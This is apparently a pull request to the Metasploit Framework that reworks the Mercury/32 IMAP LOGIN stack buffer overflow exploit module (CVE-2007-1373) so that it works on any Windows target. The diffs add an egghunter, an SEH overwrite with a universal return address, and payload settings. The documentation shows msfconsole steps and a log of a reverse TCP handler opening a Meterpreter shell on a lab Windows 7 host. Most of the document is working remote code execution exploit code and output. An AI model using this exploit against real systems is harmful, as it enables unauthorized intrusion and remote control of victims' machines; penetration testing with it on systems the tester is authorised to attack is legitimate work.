### PR TITLE
Upgraded exploit to work on any Windows target

### DIFF
--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -3,7 +3,15 @@ Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb.
 ## Vulnerable Application
 
 This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
-Here's a link to the software: http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip
+
+* [Mercury/32 v4.01(https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
+* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)
+
+This module has been tested successfully on:
+
+* Mercury/32 v4.01a on Windows XP SP3 (x86)
+* Mercury/32 v4.01a on Windows 7 SP1 (x86)
+* Mercury/32 v4.01b on Windows 7 SP1 (x86)
 
 ## Verification steps
 

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -13,7 +13,7 @@ Here's a link to the software: http://web.archive.org/web/20070119125847if_/http
   4. Do: `set RHOST IP`
   5. Do: `exploit`
   6. You should get a shell.
-       
+
 ## Scenarios
 
 ### Mercury/32 v4.01a on Windows 7 SP1 x86

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -4,7 +4,7 @@ Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb.
 
 This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
 
-* [Mercury/32 v4.01(https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
+* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
 * [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)
 
 This module has been tested successfully on:

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -11,6 +11,7 @@ This module has been tested successfully on:
 
 * Mercury/32 v4.01a on Windows XP SP3 (x86)
 * Mercury/32 v4.01a on Windows 7 SP1 (x86)
+* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
 * Mercury/32 v4.01b on Windows 7 SP1 (x86)
 
 ## Verification steps

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -1,0 +1,25 @@
+Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.
+
+## Vulnerable Application
+
+        This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This     	       vulnerability was discovered by (mu-b at digit-labs.org).
+       
+## Info
+```
+Provided by:
+  MC <mc@metasploit.com>
+  Ivan Racic
+
+Available targets:
+  Id  Name
+  --  ----
+  0   Windows Universal
+
+Basic options:
+  Name   Current Setting  Required  Description
+  ----   ---------------  --------  -----------
+  RHOST         	  yes       The target address
+  RPORT  143              yes       The target port (TCP)
+
+```
+

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -37,4 +37,3 @@ Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 ```
-

--- a/modules/exploits/windows/imap/mercury_login.md
+++ b/modules/exploits/windows/imap/mercury_login.md
@@ -2,24 +2,39 @@ Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb.
 
 ## Vulnerable Application
 
-        This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This     	       vulnerability was discovered by (mu-b at digit-labs.org).
+This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
+Here's a link to the software: http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip
+
+## Verification steps
+
+  1. Install the vulnerable Mercury/32 application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/imap/mercury_login`
+  4. Do: `set RHOST IP`
+  5. Do: `exploit`
+  6. You should get a shell.
        
-## Info
+## Scenarios
+
+### Mercury/32 v4.01a on Windows 7 SP1 x86
 ```
-Provided by:
-  MC <mc@metasploit.com>
-  Ivan Racic
+msf > use exploit/windows/imap/mercury_login1
+msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
+rhost => 192.168.46.144
+msf exploit(windows/imap/mercury_login1) > exploit
 
-Available targets:
-  Id  Name
-  --  ----
-  0   Windows Universal
+[*] Started reverse TCP handler on 192.168.46.1:4444
+[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
+[*] Sending stage (179779 bytes) to 192.168.46.144
+[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200
 
-Basic options:
-  Name   Current Setting  Required  Description
-  ----   ---------------  --------  -----------
-  RHOST         	  yes       The target address
-  RPORT  143              yes       The target port (TCP)
-
+meterpreter >
+Computer        : WIN-DQ8ELRSOJAO
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
 ```
 

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -21,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
+        'mu-b', # Discovery and exploit
         'MC', # Discovery and Metasploit module
         'Ivan Racic' # Automatic targeting + egg hunter
         ],

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -12,18 +12,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'Mercury/32 less or equal than 4.01b LOGIN SEH Buffer Overflow',
+      'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
       'Description' => '
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
       ',
-
-      'Author'         => [
+      'Author'         => 
+        [
         'MC', # Discovery and Metasploit module
         'Ivan Racic' # Automatic targeting + egg hunter
-      ],
+        ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
@@ -39,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'BadChars' => "\x0a\x0d\x20"
         },
+      'Space' => 800,
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -52,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(143)
-      ], self.class
+      ]
     )
   end
 
@@ -60,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     resp = sock.get_once
     disconnect
-    return Exploit::CheckCode::Vulnerable if resp =~ /Mercury\/32 v4\.01[a-b]/
+    return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
 
     Exploit::CheckCode::Safe
   end
@@ -75,11 +76,11 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << egg + payload.encoded
     sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
     sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
-    sploit << make_nops 20
+    sploit << make_nops(20)
     sploit << hunter
     sock.put(sploit)
     sock.get_once
-     print_status("Sending payload (#{sploit.length} bytes) ...")
+    print_status("Sending payload (#{sploit.length} bytes) ...")
     handler
     disconnect
   end

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
         'mu-b', # Discovery and exploit
-        'MC', # Discovery and Metasploit module
+        'MC', # Metasploit module
         'Ivan Racic' # Automatic targeting + egg hunter
         ],
       'License'        => MSF_LICENSE,

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2007-1373'],
-          ['OSVDB', '33883']
+          ['EDB', '3418']
         ],
       'Privileged'     => true,
       'DefaultOptions' =>

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << egg + payload.encoded
     sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
     sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
-    sploit << "\x90" * 20
+    sploit << make_nops 20
     sploit << hunter
     sock.put(sploit)
     sock.get_once

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -13,13 +13,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
-      'Description' => '
+      'Description' => %q{
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
-      ',
-      'Author'         => 
+      },
+      'Author'         =>
         [
         'MC', # Discovery and Metasploit module
         'Ivan Racic' # Automatic targeting + egg hunter
@@ -37,9 +37,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'        =>
         {
-          'BadChars' => "\x0a\x0d\x20"
+          'BadChars' => "\x00\x0a\x0d\x20",
+          'Space' => 2500
         },
-      'Space' => 800,
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -62,7 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
     resp = sock.get_once
     disconnect
     return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
-
     Exploit::CheckCode::Safe
   end
 

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -20,7 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
         discovered by (mu-b at digit-labs.org).
       ',
 
-      'Author'         => ['MC','Ivan Racic'],
+      'Author'         => [
+        'MC', # Discovery and Metasploit module
+        'Ivan Racic' # Automatic targeting + egg hunter
+      ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << hunter
     sock.put(sploit)
     sock.get_once
-    print_status("Trying target #{target.name}...")
+     print_status("Sending payload (#{sploit.length} bytes) ...")
     handler
     disconnect
   end

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     sock.get_once
     num = rand(255).to_i
-    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}}\n"
+    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
     sploit << rand_text_alpha_upper(347)
     sploit << egg + payload.encoded
     sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)

--- a/modules/exploits/windows/imap/mercury_login.rb
+++ b/modules/exploits/windows/imap/mercury_login.rb
@@ -4,87 +4,79 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mercury/32 LOGIN Buffer Overflow',
-      'Description'    => %q{
+      'Name' => 'Mercury/32 less or equal than 4.01b LOGIN SEH Buffer Overflow',
+      'Description' => '
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
-      },
-      'Author'         => [ 'MC' ],
+      ',
+
+      'Author'         => ['MC','Ivan Racic'],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2007-1373' ],
-          [ 'OSVDB', '33883' ],
+          ['CVE', '2007-1373'],
+          ['OSVDB', '33883']
         ],
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Payload'        =>
         {
-          'Space'    => 800,
-          'BadChars' => "\x00\x0a\x0d\x20",
-          'StackAdjustment' => -3500,
+          'BadChars' => "\x0a\x0d\x20"
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows 2000 SP0-SP4 English',		{ 'Ret' => 0x75022ac4 } ],
-          [ 'Windows XP Pro SP0/SP1 English',		{ 'Ret' => 0x71aa32ad } ],
-        ],
-      'DisclosureDate' => 'Mar 6 2007',
-      'DefaultTarget'  => 0))
-
+          ['Windows Universal',
+            {
+              'Ret' => 0x00401460
+            }]
+          ],
+        'DisclosureDate' => 'Mar 6 2007',
+        'DefaultTarget'  => 0))
     register_options(
       [
         Opt::RPORT(143)
-      ])
+      ], self.class
+    )
   end
 
   def check
     connect
     resp = sock.get_once
     disconnect
+    return Exploit::CheckCode::Vulnerable if resp =~ /Mercury\/32 v4\.01[a-b]/
 
-    if (resp =~ /Mercury\/32 v4\.01[a-b]/)
-      return Exploit::CheckCode::Appears
-    end
-      return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
+    hunter, egg = generate_egghunter(payload.encoded)
     connect
     sock.get_once
-
     num = rand(255).to_i
-
-    sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n"
+    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}}\n"
+    sploit << rand_text_alpha_upper(347)
+    sploit << egg + payload.encoded
+    sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
+    sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
+    sploit << "\x90" * 20
+    sploit << hunter
     sock.put(sploit)
     sock.get_once
-
-    sploit << rand_text_alpha_upper(255)
-    sock.put(sploit)
-    sock.get_once
-
-    sploit << make_nops(5295 - payload.encoded.length)
-    sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
-    sploit << make_nops(2) + [target.ret].pack('V')
-    sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750)
-
     print_status("Trying target #{target.name}...")
-
-    sock.put(sploit)
-    select(nil,nil,nil,1)
-
     handler
     disconnect
   end


### PR DESCRIPTION
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/imap/mercury_login`
- [ ] `set RHOST x.x.x.x`
- [ ] `exploit`


